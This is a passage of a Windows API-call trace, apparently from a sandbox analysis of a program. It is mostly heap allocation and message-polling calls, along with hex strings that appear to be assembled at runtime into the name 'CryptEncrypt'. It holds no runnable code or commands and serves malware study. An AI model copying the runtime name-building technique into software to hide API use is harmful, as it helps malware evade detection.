[0085.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730a8 [0085.917] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a763b0 [0085.917] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f0a08 [0085.917] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71358 [0085.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0a08 | out: hHeap=0x2af0000) returned 1 [0085.917] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a76270 [0085.917] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f0a08 [0085.917] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f0e70 [0085.917] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71378 [0085.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0510 | out: hHeap=0x2af0000) returned 1 [0085.917] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a76658 [0085.917] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71398 [0085.917] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0085.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a76658 | out: hHeap=0x2af0000) returned 1 [0085.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71398 | out: hHeap=0x2af0000) returned 1 [0085.917] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f0510 [0085.917] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71388 [0085.917] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f1008 [0085.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f1038 [0085.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71318 [0085.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71258 [0085.924] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71258 | out: hHeap=0x2af0000) returned 1 [0085.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f1398 [0085.924] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71318 | out: hHeap=0x2af0000) returned 1 [0085.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x29f1548 [0085.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a76568 [0085.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f39c0 [0085.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71368 [0085.924] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f39c0 | out: hHeap=0x2af0000) returned 1 [0085.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a765b8 [0085.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f39c0 [0085.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ebde8 [0085.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0085.924] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec0b8 [0085.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71228 [0085.924] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec0b8 | out: hHeap=0x2af0000) returned 1 [0085.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a76658 [0085.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec0b8 [0085.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ebdd0 [0085.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71308 [0085.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a76a40 [0085.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ebe90 [0085.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a712c8 [0085.924] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ebe90 | out: hHeap=0x2af0000) returned 1 [0085.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a767c0 [0085.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ebe90 [0085.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec2e0 [0085.924] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a76658 | out: hHeap=0x2af0000) returned 1 [0085.925] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71228 | out: hHeap=0x2af0000) returned 1 [0085.926] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec0b8 | out: hHeap=0x2af0000) returned 1 [0085.926] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a76658 [0085.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec0b8 [0085.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a711d8 [0085.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec340 [0085.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71398 [0085.926] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71398 | out: hHeap=0x2af0000) returned 1 [0085.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71348 [0085.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec0d0 [0085.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec220 [0085.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71398 [0085.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec4c0 [0085.926] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71398 | out: hHeap=0x2af0000) returned 1 [0085.926] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec4c0 | out: hHeap=0x2af0000) returned 1 [0085.926] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec220 | out: hHeap=0x2af0000) returned 1 [0085.926] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec0d0 | out: hHeap=0x2af0000) returned 1 [0085.926] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71348 | out: hHeap=0x2af0000) returned 1 [0085.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a711e8 [0085.926] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a711e8 | out: hHeap=0x2af0000) returned 1 [0085.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e6c0 [0085.926] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a712d8 [0085.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec220 [0085.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec0d0 [0085.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71398 [0085.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec4c0 [0085.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec5e0 [0085.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71348 [0085.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec658 [0085.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec4f0 [0085.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a712f8 [0085.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec820 [0085.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a712f8 | out: hHeap=0x2af0000) returned 1 [0085.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ed210 [0085.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a711a8 [0085.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a711a8 | out: hHeap=0x2af0000) returned 1 [0085.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29eda80 [0085.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a711a8 [0085.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a711a8 | out: hHeap=0x2af0000) returned 1 [0085.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee110 [0085.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a711e8 [0085.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee398 [0085.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec820 | out: hHeap=0x2af0000) returned 1 [0085.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec4f0 | out: hHeap=0x2af0000) returned 1 [0085.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ed210 | out: hHeap=0x2af0000) returned 1 [0085.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eda80 | out: hHeap=0x2af0000) returned 1 [0085.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec658 | out: hHeap=0x2af0000) returned 1 [0085.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71348 | out: hHeap=0x2af0000) returned 1 [0085.927] lstrlenW (lpString="43") returned 2 [0085.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee110 | out: hHeap=0x2af0000) returned 1 [0085.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a711e8 | out: hHeap=0x2af0000) returned 1 [0085.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee398 | out: hHeap=0x2af0000) returned 1 [0085.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec5e0 | out: hHeap=0x2af0000) returned 1 [0085.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec4c0 | out: hHeap=0x2af0000) returned 1 [0085.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71398 | out: hHeap=0x2af0000) returned 1 [0085.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec5e0 [0085.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec658 [0085.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71258 [0085.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec0d0 | out: hHeap=0x2af0000) returned 1 [0085.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec220 | out: hHeap=0x2af0000) returned 1 [0085.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a712d8 | out: hHeap=0x2af0000) returned 1 [0085.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec658 | out: hHeap=0x2af0000) returned 1 [0085.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71258 | out: hHeap=0x2af0000) returned 1 [0085.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec5e0 | out: hHeap=0x2af0000) returned 1 [0085.928] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.928] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71258 [0085.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec5e0 [0085.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec4c0 [0085.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71318 [0085.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec658 [0085.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec4f0 [0085.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71248 [0085.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec820 [0085.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ed210 [0085.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a711e8 [0085.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29eda80 [0085.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a711e8 | out: hHeap=0x2af0000) returned 1 [0085.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee110 [0085.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71268 [0085.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71268 | out: hHeap=0x2af0000) returned 1 [0085.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee398 [0085.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71348 [0085.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71348 | out: hHeap=0x2af0000) returned 1 [0085.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee668 [0085.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71228 [0085.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee698 [0085.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eda80 | out: hHeap=0x2af0000) returned 1 [0085.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ed210 | out: hHeap=0x2af0000) returned 1 [0085.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee110 | out: hHeap=0x2af0000) returned 1 [0085.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee398 | out: hHeap=0x2af0000) returned 1 [0085.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec820 | out: hHeap=0x2af0000) returned 1 [0085.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71248 | out: hHeap=0x2af0000) returned 1 [0085.929] lstrlenW (lpString="72") returned 2 [0085.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee668 | out: hHeap=0x2af0000) returned 1 [0085.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71228 | out: hHeap=0x2af0000) returned 1 [0085.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee698 | out: hHeap=0x2af0000) returned 1 [0085.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec4f0 | out: hHeap=0x2af0000) returned 1 [0085.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec658 | out: hHeap=0x2af0000) returned 1 [0085.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71318 | out: hHeap=0x2af0000) returned 1 [0085.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec4f0 [0085.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec658 [0085.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a711c8 [0085.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec4c0 | out: hHeap=0x2af0000) returned 1 [0085.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec5e0 | out: hHeap=0x2af0000) returned 1 [0085.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71258 | out: hHeap=0x2af0000) returned 1 [0085.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec658 | out: hHeap=0x2af0000) returned 1 [0085.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a711c8 | out: hHeap=0x2af0000) returned 1 [0085.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec4f0 | out: hHeap=0x2af0000) returned 1 [0085.929] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.929] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71208 [0085.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec4c0 [0085.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec5e0 [0085.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71248 [0085.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec658 [0085.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec4f0 [0085.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a712e8 [0085.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec820 [0085.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ed210 [0085.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a711c8 [0085.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29eda80 [0085.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a711c8 | out: hHeap=0x2af0000) returned 1 [0085.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a711c8 | out: hHeap=0x2af0000) returned 1 [0085.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71398 | out: hHeap=0x2af0000) returned 1 [0085.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eda80 | out: hHeap=0x2af0000) returned 1 [0085.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ed210 | out: hHeap=0x2af0000) returned 1 [0085.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee110 | out: hHeap=0x2af0000) returned 1 [0085.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee398 | out: hHeap=0x2af0000) returned 1 [0085.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec820 | out: hHeap=0x2af0000) returned 1 [0085.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a712e8 | out: hHeap=0x2af0000) returned 1 [0085.930] lstrlenW (lpString="79") returned 2 [0085.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee698 | out: hHeap=0x2af0000) returned 1 [0085.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a711e8 | out: hHeap=0x2af0000) returned 1 [0085.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee668 | out: hHeap=0x2af0000) returned 1 [0085.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec4f0 | out: hHeap=0x2af0000) returned 1 [0085.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec658 | out: hHeap=0x2af0000) returned 1 [0085.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71248 | out: hHeap=0x2af0000) returned 1 [0085.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec5e0 | out: hHeap=0x2af0000) returned 1 [0085.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec4c0 | out: hHeap=0x2af0000) returned 1 [0085.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71208 | out: hHeap=0x2af0000) returned 1 [0085.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec658 | out: hHeap=0x2af0000) returned 1 [0085.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71248 | out: hHeap=0x2af0000) returned 1 [0085.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec4f0 | out: hHeap=0x2af0000) returned 1 [0085.930] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.930] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71398 | out: hHeap=0x2af0000) returned 1 [0085.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71398 | out: hHeap=0x2af0000) returned 1 [0085.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a712d8 | out: hHeap=0x2af0000) returned 1 [0085.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eda80 | out: hHeap=0x2af0000) returned 1 [0085.931] lstrlenW (lpString="70") returned 2 [0085.931] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.931] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.931] lstrlenW (lpString="74") returned 2 [0085.931] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.931] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.931] lstrlenW (lpString="45") returned 2 [0085.931] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.931] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.931] lstrlenW (lpString="6E") returned 2 [0085.931] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.931] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.931] lstrlenW (lpString="63") returned 2 [0085.931] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.931] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.931] lstrlenW (lpString="72") returned 2 [0085.931] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.931] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.931] lstrlenW (lpString="79") returned 2 [0085.931] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.931] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.931] lstrlenW (lpString="70") returned 2 [0085.931] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.931] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.931] lstrlenW (lpString="74") returned 2 [0085.932] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.932] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.932] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0085.932] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.932] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, 